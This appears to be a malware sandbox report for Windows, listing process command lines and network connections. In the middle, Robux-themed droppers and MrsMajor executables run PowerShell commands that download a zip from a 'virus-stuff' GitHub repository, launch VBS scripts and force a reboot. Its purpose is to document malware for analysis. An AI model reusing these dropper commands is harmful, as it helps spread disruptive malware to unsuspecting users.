"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,16920669431839132477,16865101118076781757,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcd73946f8,0x7ffcd7394708,0x7ffcd7394718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5296 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2232 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6112 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5728 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5508 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5664 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free bobux.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6500 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:8
C:\Users\Admin\Downloads\robux.exe
"C:\Users\Admin\Downloads\robux.exe"
C:\Users\Admin\Downloads\robux.exe
"C:\Users\Admin\Downloads\robux.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FCFF.tmp\FD00.tmp\FD01.bat C:\Users\Admin\Downloads\robux.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FD2E.tmp\FD2F.tmp\FD30.bat C:\Users\Admin\Downloads\robux.exe"
C:\Users\Admin\Downloads\robux.exe
"C:\Users\Admin\Downloads\robux.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\10D5.tmp\10D6.tmp\10D7.bat C:\Users\Admin\Downloads\robux.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
C:\Windows\system32\timeout.exe
timeout /t 10 /nobreak
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x518 0x2ec
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6852 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6772 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6912 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4188 /prefetch:8
C:\Users\Admin\Downloads\MrsMajor3.0.exe
"C:\Users\Admin\Downloads\MrsMajor3.0.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\A4ED.tmp\A4EE.tmp\A4EF.vbs //Nologo
C:\Users\Admin\AppData\Local\Temp\A4ED.tmp\eulascr.exe
"C:\Users\Admin\AppData\Local\Temp\A4ED.tmp\eulascr.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6544 /prefetch:8
C:\Users\Admin\Downloads\BossDaMajor.exe
"C:\Users\Admin\Downloads\BossDaMajor.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\10D6.tmp\10D7.vbs
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" "C:\Program files\mrsmajor\mrsmajorlauncher.vbs" RunAsAdministrator
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "C:\Program Files\mrsmajor\def_resource\f11.mp4"
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
C:\Windows\System32\shutdown.exe
"C:\Windows\System32\shutdown.exe" -r -t 03
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38f8055 /state1:0x41c64e6d
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,5920817134374494044,15193759216192626741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | youranidiot.cc | udp |
| US | 103.224.182.242:80 | youranidiot.cc | tcp |
| US | 103.224.182.242:80 | youranidiot.cc | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.182.224.103.in-addr.arpa | udp |
| US | 103.224.182.242:80 | youranidiot.cc | tcp |
| US | 103.224.182.242:80 | youranidiot.cc | tcp |
| US | 103.224.182.242:80 | youranidiot.cc | tcp |
| US | 8.8.8.8:53 | ww25.youranidiot.cc | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 199.59.243.226:80 | ww25.youranidiot.cc | tcp |
| US | 199.59.243.226:80 | ww25.youranidiot.cc | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | syndicatedsearch.goog | udp |
| GB | 142.250.178.14:443 | syndicatedsearch.goog | tcp |
| US | 8.8.8.8:53 | partner.googleadservices.com | udp |
| GB | 142.250.200.2:443 | partner.googleadservices.com | tcp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.179.228:443 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | syndicatedsearch.goog | udp |
| GB | 2.16.153.206:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 206.153.16.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | youranidiot.org | udp |
| DE | 185.53.178.50:80 | youranidiot.org | tcp |
| DE | 185.53.178.50:80 | youranidiot.org | tcp |
| GB | 142.250.179.228:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | d38psrni17bvxu.cloudfront.net | udp |
| CZ | 65.9.94.166:80 | d38psrni17bvxu.cloudfront.net | tcp |
| GB | 142.250.200.2:443 | partner.googleadservices.com | udp |
| US | 8.8.8.8:53 | 50.178.53.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.94.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:9229 | tcp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | devtools.azureedge.net | udp |
| US | 13.107.246.64:443 | devtools.azureedge.net | tcp |
| US | 8.8.8.8:53 | 64.246.107.13.in-addr.arpa | udp |
| N/A | 127.0.0.1:9229 | tcp | |
| GB | 2.16.153.224:443 | www.bing.com | tcp |
| GB | 2.16.153.224:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 224.153.16.2.in-addr.arpa | udp |
| GB | 2.16.153.224:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aladel.net | udp |
| NL | 185.107.56.59:80 | aladel.net | tcp |
| NL | 185.107.56.59:80 | aladel.net | tcp |
| US | 8.8.8.8:53 | ww1.aladel.net | udp |
| US | 208.91.196.145:80 | ww1.aladel.net | tcp |
| US | 208.91.196.145:80 | ww1.aladel.net | tcp |
| US | 8.8.8.8:53 | 59.56.107.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.196.91.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 2.16.153.224:443 | r.bing.com | tcp |
| GB | 2.16.153.224:443 | r.bing.com | tcp |
| GB | 2.16.153.224:443 | r.bing.com | tcp |
| GB | 2.16.153.224:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| GB | 2.16.153.224:443 | r.bing.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 40.126.32.133:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 8.8.8.8:53 | 80.5.107.13.in-addr.arpa | udp |
| US | 104.18.33.89:443 | www2.bing.com | tcp |
| US | 104.18.33.89:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | 89.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 104.18.33.89:443 | www2.bing.com | tcp |
| US | 104.18.33.89:443 | www2.bing.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
